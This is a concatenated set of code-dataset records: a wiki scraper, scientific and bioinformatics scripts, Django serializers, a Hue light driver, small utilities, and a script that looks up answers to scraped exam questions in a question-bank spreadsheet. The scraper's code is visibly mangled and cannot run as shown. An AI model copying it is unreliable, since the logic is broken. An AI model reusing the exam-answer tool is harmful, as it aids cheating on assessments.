as pd\nimport requests\n\ntarget_url = {\"jp\": \"http://scp-jp.wikidot.com/foundation-tales-jp\",\n \"en\": \"http://scp-jp.wikidot.com/foundation-tales\",\n \"ru\": \"http://scp-jp.wikidot.com/foundation-tales-ru\",\n \"cn\": \"http://scp-jp.wikidot.com/foundation-tales-cn\",\n \"fr\": \"http://scp-jp.wikidot.com/foundation-tales-fr\",\n \"pl\": 'http://scp-jp.wikidot.com/foundation-tales-pl',\n \"es\": 'http://scp-jp.wikidot.com/foundation-tales-es',\n \"de\": 'http://scp-jp.wikidot.com/foundation-tales-de',\n \"th\": 'http://scp-jp.wikidot.com/foundation-tales-th',\n \"it\": 'http://scp-jp.wikidot.com/foundation-tales-it',\n \"ua\": 'http://scp-jp.wikidot.com/foundation-tales-ua',\n \"pt\": 'http://scp-jp.wikidot.com/foundation-tales-pt',\n \"ko\": 'http://scp-jp.wikidot.com/foundation-tales-ko'\n }\n\nstart_word = {\"jp\": '

アルファベット順著者

',\n \"en\": '

アルファベット順著者

',\n \"ru\": '

著作者順

',\n \"cn\": '

著作者順

',\n \"fr\": '

著作者順

',\n \"pl\": '

著作者順

',\n \"es\": '

著作者順

',\n \"de\": '

著作者順

',\n \"th\": '

著作者順

',\n \"it\": '

著作者順

',\n \"ua\": '

著作者順

',\n \"pt\": '

著作者順

',\n \"ko\": '

著作者順

',\n }\n\nend_word = {\"jp\": 'その他',\n \"en\": 'その他',\n \"ru\": '',\n \"cn\": '',\n \"fr\": '',\n \"pl\": '',\n \"es\": '',\n \"de\": '',\n \"th\": '',\n \"it\": '',\n \"ua\": '',\n \"pt\": '',\n \"ko\": '',\n }\n\n\nexclusion_list = ['#top',\n 'http://scp-jp.wikidot.com/forum/t-6047066/',\n # '',\n '',\n '\\s', line):\n scp_lines.remove(line)\n elif re.match('.', line):\n scp_lines.remove(line)\n elif '⇑' in line:\n scp_lines.remove(line)\n\n for line in scp_lines[tales_start:]:\n line = html.unescape(line)\n\n if end_word[key] in line:\n break\n\n # author start\n elif '.*?\", line)\n if author is not None:\n author = author.group()[8:-9]\n\n if author is None:\n author = re.search(\".*?\", line)\n if author is not None:\n author = author.group()[4:-5]\n\n if author is None:\n author = \"Unknown pattern of author\"\n\n elif '

' in line:\n author = line.replace(\"

\", \"\")\n author = author.replace(\"

\", \"\")\n\n elif '

' in line:\n author = line[line.find(\n 'return false;\">') + len('return false;\">'):]\n author = author.replace(\"

\", \"\")\n\n elif '

' in line:\n author = line[line.find('

') +\n len('

'): -\n len(' does not match any existing user name

')]\n # author end\n\n # url,title start\n elif any([s for s in exclusion_list if s in line]):\n pass\n\n else:\n if \"]', line)\n url = sp_line[3].replace('\"', \"\").replace(\"a href=\", \"\")\n title = sp_line[4]\n\n elif ']', line)\n url = sp_line[3].replace('\"', \"\").replace(\n 'a target=_blank href=http://scp-jp.wikidot.com', \"\")\n title = sp_line[4]\n\n elif '
  • ]', line)\n url = sp_line[3].replace('\"', \"\").replace(\"a href=\", \"\")\n title = sp_line[4]\n\n else:\n continue\n\n if 'http://scp-jp.wikidot.com/' in url:\n url = url.replace(\"http://scp-jp.wikidot.com\", '')\n\n urls.append(url)\n titles.append(title)\n authors.append(author)\n brts.append(key)\n\n print(f\"\\tpage:{key}のデータ取得が完了しました。\")\n\n df = pd.DataFrame(columns=['url', 'title', 'author', 'branches'])\n\n df['url'] = urls\n df['title'] = titles\n df['author'] = authors\n df['branches'] = brts\n df.to_csv(masterpath + \"/data/tale.csv\", header=True, encoding=\"utf-8\")\n\n\nif __name__ == \"__main__\":\n print(\"菖蒲:taleデータベースの更新を更新します。\")\n tale()\n print(\"菖蒲:taleデータベースの更新、完了しました。\")\n","sub_path":"ayame/tales.py","file_name":"tales.py","file_ext":"py","file_size_in_byte":6954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"611770492","text":"#!/usr/bin/env python\n\n#==================================================\n#__________________________________________________\n\n# Copyrigth 2016 A. Farchi and M. Bocquet\n# CEREA, joint laboratory Ecole des Ponts ParisTech and EDF R&D\n\n# Code for the paper: Using the Wasserstein distance to compare fields of pollutants:\n# Application to the radionuclide atmospheric dispersion of the Fukushima-Daiichi accident\n# by A. Farchi, M. Bocquet, Y. Roustan, A. Mathieu and A. Querel\n\n#__________________________________________________\n#==================================================\n\nfrom OT.utils.sys.argv import extractArgv\nfrom OT.OTObjects2D.configuration import Configuration\nfrom OT.OTObjects2D.analyse.computeOperators import applyAllOperators\n\n# Extract Arguments\narguments = extractArgv()\n\ntry:\n configFile = arguments['CONFIG_FILE']\n config = Configuration(configFile)\n outputDir = config.outputDir\nexcept:\n outputDir = arguments['OUTPUT_DIR']\n\n# Analyse\napplyAllOperators(outputDir)\n","sub_path":"analyseSimulation2D.py","file_name":"analyseSimulation2D.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226810153","text":"#!/usr/bin/python3\nimport sys\nimport os\n\npkg_dir = os.path.dirname( os.path.realpath(__file__) )\npylib_dir = os.path.join( pkg_dir, '..','pylib' )\n\nif os.path.isdir( pylib_dir ):\n print(\"mif-digest: using development library version\")\n sys.path.insert(0,pylib_dir)\n\nimport argparse\nfrom zipfile import ZipFile\n\nimport pymex\n\n#test_mif25='/cluster1/mirrors/imex/intact/psi25/2018/9171338.zip'\ntest_mif25='ftp://ftp.ebi.ac.uk/pub/databases/intact/current/psi25/pmid/2019/15138291.xml'\n\nparser = argparse.ArgumentParser(description='MIF Reader')\nparser.add_argument( '--source', dest=\"source\", type=str, required=True,\n help='MIF file location (path or URL). Compressed file OK.')\nargs = parser.parse_args()\n\nmifParser = pymex.psimi.Mif254Parser()\n\nsource = []\n\nif args.source.endswith( \".zip\" ):\n myzip = ZipFile( args.source, 'r' )\n\n for sl in myzip.namelist():\n print(sl)\n \n # skip 'negative' interaction files\n # ( ie experiments demonstrating interaction does not happen) \n \n if sl.find(\"negative\") < 0 : \n source.append( myzip.open( sl, 'r' ) )\nelse:\n source.append( open(args.source, 'r' ) )\n\naclist = {}\ns = {} \n\nfor cs in source: \n rec = mifParser.parse( cs )\n\n for int in rec.inlist:\n \n print( \" =======\" ) \n \n itype = int.type\n \n method = \"N/S\"\n if int.evlist is not None and len(int.evlist) > 0:\n intmethod = int.evlist[0]['intMth']\n \n print( \"\\n Interaction: label:\\t\",int.label,\"\\timexId:\\t\", int.imex )\n print( \" Interaction Type: \",itype[\"ac\"],\"\\t\",itype[\"label\"])\n print( \" Method(interaction): \",intmethod[\"ac\"],\"\\t\",intmethod[\"label\"])\n if 'prtMth' in int.evlist[0]:\n prtmethod = int.evlist[0]['prtMth']\n if prtmethod is not None:\n print( \" Id Mth(participant): \",prtmethod[\"ac\"],\"\\t\",prtmethod[\"label\"])\n\n if int.ptolist is not None and len(int.ptolist) > 0:\n print( \" Participants:\" )\n for pto in int.ptolist:\n print( pto )\n #print( \" ------\" )\n #print( \" \",pto.interactor.pxref[\"ac\"],\"\\t\", pto.interactor.label,pto.interactor.name )\n #print( \" type: \", pto.interactor.type[\"label\"] )\n #print( \" role: \", pto.erole[0][\"label\"] )\n #print( \" ------\" ) \n\n print( \" =======\" )\n\n\n","sub_path":"script/mif-read.py","file_name":"mif-read.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"405349063","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom drf_writable_nested import WritableNestedModelSerializer\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\n\nfrom api.serializers.producers import ProducerSerializer\nfrom competitions.models import Competition, Phase, Submission, CompetitionParticipant\n\n\nclass CompetitionParticipantSerializer(serializers.ModelSerializer):\n class Meta:\n model = CompetitionParticipant\n fields = ('competition', 'user')\n\n\nclass PhaseSerializer(WritableNestedModelSerializer):\n class Meta:\n model = Phase\n fields = (\n 'id',\n # 'competition',\n 'index',\n 'start',\n 'end',\n 'name',\n 'description',\n 'is_active',\n )\n\n\nclass SubmissionSerializer(serializers.ModelSerializer):\n competition = serializers.IntegerField(min_value=1, write_only=True, required=True)\n phase_index = serializers.IntegerField(min_value=1, write_only=True, required=True)\n\n class Meta:\n model = Submission\n fields = (\n 'remote_id',\n 'competition', # on write only\n 'phase_index', # on write this is the phase index within the competition, NOT a PK\n 'submitted_at',\n 'participant',\n )\n\n def validate(self, attrs):\n competition = Competition.objects.get(\n remote_id=attrs.pop('competition'),\n producer=self.context.get('producer')\n )\n attrs['phase'] = competition.phases.get(index=attrs.pop('phase_index'))\n return attrs\n\n def create(self, validated_data):\n instance, _ = Submission.objects.update_or_create(\n remote_id=validated_data.pop('remote_id'),\n phase=validated_data.pop('phase'),\n defaults=validated_data\n )\n return instance\n\n\nclass CompetitionSerializer(WritableNestedModelSerializer):\n # Stop the \"uniqueness\" validation, we want to be able to update already\n # existing models\n # Also, Producer in this case comes from serializer context\n producer = ProducerSerializer(required=False, validators=[])\n phases = PhaseSerializer(required=False, many=True)\n participants = CompetitionParticipantSerializer(many=True, read_only=True)\n admins = serializers.StringRelatedField(many=True, read_only=True)\n\n class Meta:\n model = Competition\n fields = (\n 'id',\n 'remote_id',\n 'title',\n 'producer',\n 'created_by',\n 'start',\n 'logo',\n 'url',\n 'phases',\n 'participants',\n 'description',\n 'end',\n 'admins',\n 'is_active',\n # 'get_active_phase_end',\n 'participant_count',\n 'html_text',\n 'current_phase_deadline',\n 'prize',\n 'published'\n )\n validators = []\n extra_kwargs = {\n 'producer': {\n # UniqueTogether validator messes this up\n 'validators': [],\n }\n }\n\n def validate_description(self, description):\n if description:\n description = description.replace(\"

    \", \"\").replace(\"

    \", \"\")\n return description\n\n def validate_producer(self, producer):\n context_producer = self.context.get(producer)\n if context_producer:\n return context_producer\n\n if not producer:\n raise ValidationError(\"Producer not found when creating data entry\")\n return producer\n\n def create(self, validated_data):\n try:\n temp_instance = Competition.objects.get(\n remote_id=validated_data.get('remote_id'),\n producer__id=self.context['producer'].id\n )\n except ObjectDoesNotExist:\n temp_instance = None\n # If we have an existing instance from this producer\n # with the same remote_id, update it instead of making a new one\n if temp_instance:\n return self.update(temp_instance, validated_data)\n else:\n new_instance = super(CompetitionSerializer, self).create(validated_data)\n new_instance.producer = self.context['producer']\n new_instance.save()\n return new_instance","sub_path":"src/apps/api/serializers/competitions.py","file_name":"competitions.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647775246","text":"import tkinter\n\nroot = tkinter.Tk()\nroot.title(\"Music Player\")\nimg = tkinter.PhotoImage(file=\"audio.png\")\nroot.iconphoto(root, img)\n\nwidth = 1366 // 2\nheight = 763 // 2\nx = 1366 // 4\ny = 763 // 4\nroot.geometry(f\"{width}x{height}+{x}+{y}\")\nroot.resizable(False, False)\nroot.mainloop()\n","sub_path":"Projects/Music Player/Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"323730681","text":"import csv\ndef getonedom(mail:str):\n x = mail.partition('@')\n dom = x[2]\n return dom.lower()\n\n\ndef getDomains(fpath):\n listdom = []\n with open(fpath) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n temph = getonedom(row[1])\n vool = temph in listdom\n if vool == False:\n listdom.append(temph)\n \n return listdom\n\ndef getAverages(fpath):\n countT = 0\n results = dict()\n lisdom = getDomains(fpath)\n results = dict.fromkeys(lisdom,0)\n for i in lisdom:\n numl = []\n domstr = lisdom[countT]\n countT += 1\n with open(fpath) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n if getonedom(row[1]) == domstr:\n numl.append(int(row[2]))\n actual_average = round(sum(numl)/(len(numl)),2)\n results[domstr] = actual_average\n\n\n return results\n \n\nif __name__ == \"__main__\":\n# print(getAverages('MOCK_DATA.csv'))\n print(getAverages('Practica4TData.csv')) \n # print(getDomains('Practica4TData.csv'))\n","sub_path":"ago-dic-2020/Jesus Antonio Gonzalez Cardenas/Practica4/Practica4.py","file_name":"Practica4.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"283170633","text":"# coding=utf-8\n# Version:python 3.7.0\n# Tools:Pycharm 2020.2\n\nimport pandas as pd\nfrom pandas import read_excel\nimport xlrd\n_date_ = '2020/12/11 14:13'\n_author_ = 'Lewis'\n\nimport re\nimport os\nimport csv\n\ndef GetAnswer(question):\n excel_file = r'副本12.16更新形势与政策必答题库(不完整).xlsx'\n data = pd.read_excel(excel_file, index_col='题目')\n\n # 这个的index_col就是index,可以选择任意字段作为索引index,读入数据\n # answer = '无答案'\n\n try:\n answer = data.loc[question]['答案']\n # print(data.loc[question])\n\n print(\"答案 : \"+str(answer))\n return str(answer)\n except KeyError:\n print('无答案')\n return '无答案'\n\n# name = \"选答自测2\" # 这里自己输入文件名字,例如我们要处理ab.txt文件,此处name = \"ab\", 该写法需要将txt文件和该脚本放在同一目录下\n# name = \"必答自测1\"\nname = \"考试系统\"\n# name = \"期末考试\"\ntxtName = name + \".html\"\ncsvName = name + \".csv\"\n\nfp = open(txtName, \"rb\") # 打开txt文本\na = fp.read() # 读取txt文本\nresult = re.findall(r'

    ([\\s\\S]*?)

    ', a.decode('utf-8')) # 正则匹配\nlist1 = [] # 该列表用于临时存储字符串\ncount = 1\nfor i in result: # 匹配到的内容逐条提取\n if i != '': # 过滤空白字符\n i = i.replace(\"(\", \"(\")\n i = i.replace(\")\", \")\")\n i = i.replace(\" \",\"\")\n i = i.strip()\n print(\"第 \"+str(count)+\" 题: \"+i) # 看匹配到的内容\n count += 1\n list1.append(i) # 将字符串添加到列表再写进去,不然字符会被拆开成一个一个\n # GetAnswer(i)\n answer = GetAnswer(i) # 获取题目的答案\n list1.append(',') # 添加逗号\n answer = answer.replace(u'\\xa0', u' ')\n list1.append(answer) # 添加答案 //答案里的\\xa0 是不间断空白符   需要用空格替换掉\n # 下面就是写入csv文件的功能了,newline=''可以避免空行问题\n with open(csvName, 'a', newline='') as csvfile:\n writer = csv.writer(csvfile)\n\n writer.writerow(list1)\n list1.pop() # 写入完成要将列表中的字符串删除\n list1.pop()\n list1.pop()","sub_path":"查询本地题库/newMethod.py","file_name":"newMethod.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"79804915","text":"from Firefly import logging\n# from rgb_cie import Converter\nfrom Firefly.components.hue.ct_fade import CTFade\nfrom Firefly.components.virtual_devices import AUTHOR\nfrom Firefly.const import ACTION_LEVEL, ACTION_OFF, ACTION_ON, ACTION_TOGGLE, COMMAND_SET_LIGHT, COMMAND_UPDATE, DEVICE_TYPE_COLOR_LIGHT, EVENT_ACTION_OFF, LEVEL, STATE, SWITCH\nfrom Firefly.helpers.device import COLOR, COLOR_TEMPERATURE\nfrom Firefly.helpers.device_types.light import Light\nfrom Firefly.helpers.events import Command\nfrom Firefly.services.alexa.alexa_const import ALEXA_INTERFACE, ALEXA_LIGHT, ALEXA_POWER_INTERFACE, ALEXA_POWER_LEVEL_INTERFACE\nfrom Firefly.util.color import color_temperature_kelvin_to_mired, color_temperature_mired_to_kelvin, Colors, check_ct\n\nTITLE = 'Firefly Hue Device'\nDEVICE_TYPE = DEVICE_TYPE_COLOR_LIGHT\nAUTHOR = AUTHOR\nCOMMANDS = [ACTION_OFF, ACTION_ON, ACTION_TOGGLE, ACTION_LEVEL, COMMAND_SET_LIGHT, 'ct_fade']\nINITIAL_VALUES = {\n '_state': EVENT_ACTION_OFF,\n '_uniqueid': '-1',\n '_manufacturername': 'unknown',\n '_on': False,\n '_switch': 'off',\n '_hue': 0,\n '_sat': 0,\n '_effect': False,\n '_xy': 0,\n '_colormode': 'unknown',\n '_alert': False,\n '_bri': 0,\n '_reachable': False,\n '_type': 'unknown',\n '_ct': 0,\n '_level': 0,\n '_hue_noun': 'state',\n '_hue_service': 'service_hue',\n '_hue_number': -1\n}\n\nCAPABILITIES = {\n LEVEL: True,\n SWITCH: True,\n COMMAND_SET_LIGHT: True,\n COLOR: True,\n COLOR_TEMPERATURE: True\n}\n\n\nclass HueDevice(Light):\n def __init__(self, firefly, package, title, author, commands, requests, device_type, **kwargs):\n if not kwargs.get('initial_values'):\n kwargs['initial_values'] = INITIAL_VALUES\n else:\n # TODO: Remove hacky logic\n # INITIAL_VALUES.update(kwargs['initial_values'])\n kwargs['initial_values'] = INITIAL_VALUES\n if commands:\n c = set(commands)\n c.update(COMMANDS)\n commands = list(c)\n super().__init__(firefly, package, title, author, commands, requests, device_type, capabilities=CAPABILITIES, **kwargs)\n\n self.__dict__.update(kwargs['initial_values'])\n\n if self._alias == self.id:\n self._alias = kwargs.get('name')\n\n # TODO: Remove hue_bridge?\n self._hue_bridge = kwargs.get('hue_bridge')\n self._hue_service = kwargs.get('hue_service')\n\n # self.add_command(ACTION_OFF, self.off)\n # self.add_command(ACTION_ON, self.on)\n # self.add_command(ACTION_TOGGLE, self.toggle)\n self.add_command(COMMAND_UPDATE, self.update)\n # self.add_command(ACTION_LEVEL, self.set_level)\n # self.add_command(COMMAND_SET_LIGHT, self.setLight)\n self.add_command('ct_fade', self.set_ct_fade)\n\n # self.add_request(STATE, self.get_state)\n # self.add_request(LEVEL, self.get_level)\n\n # self.add_request(STATE, self.get_state)\n # self.add_request(SWITCH, self.get_state)\n\n # self.add_request('hue', self.get_hue)\n # self.add_request('sat', self.get_sat)\n # self.add_request('ct', self.get_ct)\n\n # self.add_action(SWITCH, action_on_off_switch())\n # self.add_action(LEVEL, action_dimmer())\n\n # self.add_alexa_action(ALEXA_OFF)\n # self.add_alexa_action(ALEXA_ON)\n # self.add_alexa_action(ALEXA_SET_PERCENTAGE)\n # self.add_alexa_action(ALEXA_SET_COLOR_TEMP)\n # self.add_alexa_action(ALEXA_SET_COLOR)\n\n self.add_alexa_categories(ALEXA_LIGHT)\n # TODO: Finish adding alexa types\n self.add_alexa_capabilities([ALEXA_INTERFACE, ALEXA_POWER_INTERFACE, ALEXA_POWER_LEVEL_INTERFACE])\n\n # TODO: Make HOMEKIT CONST\n self.add_homekit_export('HOMEKIT_COLOR_LIGHT', STATE)\n\n self._hue_noun = 'state' if self._package == 'Firefly.components.hue.hue_light' else 'action'\n\n if self._hue_noun == 'state':\n self._hue_type = 'light'\n else:\n self._hue_type = 'group'\n self._hue_number = kwargs.get('hue_number')\n\n self._name = kwargs.get('name')\n self._uniqueid = kwargs.get('uniqueid', '-1')\n self._manufacturername = kwargs.get('manufacturername', '')\n self._swversion = kwargs.get('swversion', '')\n self._modelid = kwargs.get('modelid', '')\n self._bri = 0\n self._ct_fade = None\n\n if kwargs.get(self.hue_noun):\n hue_device = kwargs.get(self.hue_noun)\n switch = hue_device.get('on')\n hue = hue_device.get('hue')\n sat = hue_device.get('sat')\n bri = hue_device.get('bri')\n ct = int(color_temperature_mired_to_kelvin(hue_device.get('ct', 2700)))\n level = int(bri / 255.0 * 100.0)\n self.update_values(level=level, switch=switch, hue=hue, sat=sat, bri=bri, ct=ct)\n\n # self._on = kwargs.get(self.hue_noun).get('on', False)\n # self._hue = kwargs.get(self.hue_noun).get('hue', 0)\n # self._sat = kwargs.get(self.hue_noun).get('sat', 0)\n self._effect = kwargs.get(self.hue_noun).get('effect', '')\n self._xy = kwargs.get(self.hue_noun).get('xy', 0)\n self._colormode = kwargs.get(self.hue_noun).get('colormode', '')\n self._alert = kwargs.get(self.hue_noun).get('alert', False)\n # self._bri = kwargs.get(self.hue_noun).get('bri', 0)\n self._reachable = kwargs.get(self.hue_noun).get('reachable', '-1')\n #self._ct = kwargs.get(self.hue_noun).get('ct', 0)\n\n # self._level = int(self._bri / 255.0 * 100.0)\n\n def update(self, **kwargs):\n self._name = kwargs.get('name')\n self._uniqueid = kwargs.get('uniqueid', '')\n self._manufacturername = kwargs.get('manufacturername', '')\n self._swversion = kwargs.get('swversion', '')\n self._modelid = kwargs.get('modelid', '')\n self._hue_service = kwargs.get('hue_service', 'service_hue')\n self._hue_number = kwargs.get('hue_number')\n\n if self._alias != self._name:\n self._alias = self._name\n self.firefly.aliases.set_alias(self.id, self._alias)\n\n if kwargs.get(self.hue_noun):\n hue_device = kwargs.get(self.hue_noun)\n switch = hue_device.get('on')\n hue = hue_device.get('hue')\n sat = hue_device.get('sat')\n bri = hue_device.get('bri')\n ct = int(color_temperature_mired_to_kelvin(hue_device.get('ct', 2700)))\n level = int(bri / 255.0 * 100.0)\n self.update_values(level=level, switch=switch, hue=hue, sat=sat, bri=bri, ct=ct)\n\n # self._on = kwargs.get(self.hue_noun).get('on')\n # self._hue = kwargs.get(self.hue_noun).get('hue')\n # self._sat = kwargs.get(self.hue_noun).get('sat')\n # self._effect = kwargs.get(self.hue_noun).get('effect')\n self._xy = kwargs.get(self.hue_noun).get('xy')\n self._colormode = kwargs.get(self.hue_noun).get('colormode')\n self._alert = kwargs.get(self.hue_noun).get('alert')\n # self._bri = kwargs.get(self.hue_noun).get('bri')\n self._reachable = kwargs.get(self.hue_noun).get('reachable')\n #self._ct = kwargs.get(self.hue_noun).get('ct')\n # self._level = int(self._bri / 255.0 * 100.0)\n\n @property\n def hue_noun(self):\n return self._hue_noun\n\n def set_light(self, switch=None, level=None, colors=Colors(), ct=None, **kwargs):\n logging.info('[HUE] VALUES SWITCH: %s LEVEL %s KWARGS %s' % (switch, level, str(kwargs)))\n\n value = kwargs\n hue_value = {}\n\n # TRANS TIME\n transitiontime = value.get('transitiontime')\n if transitiontime is not None:\n try:\n transitiontime = int(transitiontime)\n except:\n transitiontime = 20\n hue_value.update({\n 'transitiontime': transitiontime\n })\n else:\n transitiontime = 20\n #hue_value.update({\n # 'transitiontime': transitiontime\n #})\n\n # END FADE IF SET COMMAND IS GIVEN\n if not value.get('ct_fade', False):\n if self._ct_fade is not None:\n self._ct_fade.endRun()\n self._ct_fade = None\n\n if switch is not None:\n hue_value.update({\n 'on': switch == 'on'\n })\n self.update_values(switch=switch)\n\n if level is not None:\n bri = 0\n try:\n level = int(level)\n except:\n level = 100\n\n if level > 0:\n level = min(level, 100)\n bri = int(255.0 / 100.0 * level)\n hue_value.update({\n 'bri': bri,\n 'on': True\n })\n else:\n hue_value.update({\n 'bri': bri,\n 'on': False\n })\n self._bri = bri\n self.update_values(level=level)\n\n if colors.is_set:\n hue = int(colors.hue_expanded)\n sat = int(colors.sat_expanded)\n hue_value.update({\n 'hue': hue,\n 'sat': sat\n })\n self.update_values(hue=hue, sat=sat, bri=self._bri)\n\n if ct is not None:\n ct = check_ct(ct, kelvin=False)\n hue_value.update({\n 'ct': ct\n })\n self.update_values(ct=color_temperature_mired_to_kelvin(ct))\n\n logging.info('[HUE] HUE VALUE %s' % str(hue_value))\n self.set_hue_device(hue_value)\n\n\n '''\n def setLight(self, **kwargs):\n value = kwargs\n hue_value = {}\n\n # TODO: Remove This\n logging.info(value)\n\n # END FADE IF SET COMMAND IS GIVEN\n if not value.get('ct_fade', False):\n if self._ct_fade is not None:\n self._ct_fade.endRun()\n self._ct_fade = None\n\n # XY\n xy = value.get('xy')\n if xy is not None:\n hue_value.update({\n 'xy': xy\n })\n self._xy = xy\n\n # HUE\n hue = value.get('hue')\n if hue is not None:\n hue_value.update({\n 'hue': hue\n })\n self._hue = hue\n\n # TRANS TIME\n transitiontime = value.get('transitiontime')\n if transitiontime is not None:\n try:\n transitiontime = int(transitiontime)\n except:\n transitiontime = 40\n hue_value.update({\n 'transitiontime': transitiontime\n })\n\n ## NAME COLOR\n # name = value.get('name')\n # if name:\n # value['hex'] = name_to_hex(name)\n\n # HEX COLOR\n hexColor = value.get('hex')\n if hexColor is not None:\n hue_value.update(self.hexColor(hexColor))\n\n ## PRESET\n # preset = value.get('preset')\n # if preset:\n # if preset in PRESETS_CT:\n # value['ct'] = PRESETS_CT.get(preset)\n\n # SET FOR LEVEL\n level = value.get('level')\n if level is not None:\n try:\n level = int(level)\n except:\n level = 100\n\n if level > 0:\n level = min(level, 100)\n bri = int(255.0 / 100.0 * level)\n self._bri = bri\n self._on = True\n hue_value.update({\n 'bri': bri,\n 'on': True\n })\n else:\n bri = 0\n level = 0\n self._on = False\n hue_value.update({\n 'bri': bri,\n 'on': False\n })\n self._bri = bri\n self._level = level\n\n # SET FOR BRI\n bri = value.get('bri')\n if bri is not None:\n bri = min(bri, 255)\n if bri <= 0:\n bri = 0\n self._level = 0\n self._on = False\n hue_value.update({\n 'on': False\n })\n else:\n self._on = True\n self._level = int(bri / 255.0 * 100.0)\n hue_value.update({\n 'bri': bri,\n 'on': True\n })\n self._bri = bri\n\n # SET CT:\n ct = value.get('ct')\n if ct is not None:\n ct = check_ct(ct)\n hue_value.update({\n 'ct': ct\n })\n self._ct = ct\n\n # SET SAT:\n sat = value.get('sat')\n if sat is not None:\n try:\n sat = int(sat)\n sat = min(sat, 255)\n sat = max(sat, 0)\n hue_value.update({\n 'sat': sat\n })\n except:\n pass\n\n # EFFECT\n effect = value.get('effect')\n if effect is not None:\n hue_value.update({\n 'effect': effect\n })\n self._effect = effect\n\n # ALERT\n alert = value.get('alert')\n if alert is not None:\n hue_value.update({\n 'alert': alert\n })\n self._alert = alert\n\n # SET FOR ON\n on = value.get('on')\n if on is not None:\n if on:\n hue_value.update({\n 'on': on\n })\n else:\n hue_value.update({\n 'on': on\n })\n self._on = on\n\n switch = value.get('switch')\n if switch is not None:\n hue_value.update({\n 'on': switch == 'on'\n })\n self._on = switch == 'on'\n\n # Turn lights on unless told not to or has already been set\n if hue_value.get('on') is None and not value.get('no_on'):\n hue_value.update({\n 'on': True\n })\n self._on = True\n\n # Process special values from alexa\n alexa = value.get('alexa')\n if alexa is not None:\n hue = int(65535 / 360 * alexa.get('hue', 0))\n sat = int(alexa.get('saturation', 0) * 254)\n bri = int(alexa.get('brightness', 0) * 254)\n\n hue_value = {\n 'hue': hue,\n 'bri': bri,\n 'sat': sat\n }\n\n # TODO: Remove This\n logging.info(hue_value)\n self.set_hue_device(hue_value)\n return value\n '''\n\n def set_ct_fade(self, **kwargs):\n \"\"\"\n Set color temperature fade over time.\n\n Args:\n start_k: (str) Start color temp in k (2700k)\n end_k: (str) End color temp in k (2700k)\n start_level: (int) Start level\n end_level: (int) End Level\n\n Returns:\n None\n\n \"\"\"\n start_k = kwargs.get('start_k')\n end_k = kwargs.get('end_k')\n start_level = kwargs.get('start_level')\n end_level = kwargs.get('end_level')\n\n try:\n if 'K' in start_k.upper():\n start_k = int(start_k.upper().replace('K', ''))\n if 'K' in end_k.upper():\n end_k = int(end_k.upper().replace('K', ''))\n start_k = min(start_k, 6500)\n start_k = max(start_k, 2000)\n end_k = min(end_k, 6500)\n end_k = max(end_k, 2000)\n\n fade_sec = int(kwargs.get('fade_sec', 1500))\n if start_level is not None and end_level is not None:\n start_level = int(start_level)\n end_level = int(end_level)\n\n except:\n logging.error(code='FF.HUE.SET.002') # error parsing ct_fade\n return\n\n self._ct_fade = CTFade(self._firefly, str(self.id), start_k, end_k, fade_sec, start_level, end_level)\n\n def set_hue_device(self, value):\n path = '%ss/%s/%s' % (self._hue_type, self._hue_number, self._hue_noun)\n command = Command(self._hue_service, self.id, 'send_request', **{\n 'path': path,\n 'data': value,\n 'method': 'PUT'\n })\n self.firefly.send_command(command)\n\n def hexColor(self, colorHex):\n if '#' in colorHex:\n colorHex = colorHex.replace('#', '')\n if 'LST' in self._modelid:\n # TODO: Fix this\n return colorHex\n # return {'xy': converter.hexToCIE1931(colorHex, lightType='LST')}\n # return {'xy': converter.hexToCIE1931(colorHex)}\n\n","sub_path":"Firefly/components/hue/hue_device.py","file_name":"hue_device.py","file_ext":"py","file_size_in_byte":14627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"495766212","text":"# Given a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).\r\n#\n#\n# For example:\r\n# Given binary tree [3,9,20,null,null,15,7],\r\n#\n# 3\r\n# / \\\r\n# 9 20\r\n# / \\\r\n# 15 7\r\n#\n#\n#\n# return its bottom-up level order traversal as:\r\n#\n# [\r\n# [15,7],\r\n# [9,20],\r\n# [3]\r\n# ]\r\n#\n#\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:\n \"\"\"\n if not root:\n return []\n s = [root]\n \n res = [[root.val]]\n while s:\n each_level = []\n each_level_value = []\n \n while s:\n top = s.pop(0) # if pop() the rightmost will be popped out first\n \n if top.left:\n each_level.append(top.left)\n each_level_value.append(top.left.val)\n if top.right:\n each_level.append(top.right)\n each_level_value.append(top.right.val)\n s = each_level\n if each_level_value:\n res.append(each_level_value)\n \n rev_res = []\n while res:\n rev_res.append(res.pop())\n return rev_res\n \"\"\"\n \n if not root:\n return []\n \n ans = []\n each_level = [root]\n while each_level:\n ans.insert(0, [i.val for i in each_level]) # insert from front\n each_level = [j for i in each_level for j in (i.left, i.right) if j] # update each_level using next level\n return ans\n","sub_path":"solutions/0107-binary-tree-level-order-traversal-ii/binary-tree-level-order-traversal-ii.py","file_name":"binary-tree-level-order-traversal-ii.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"234652857","text":"import 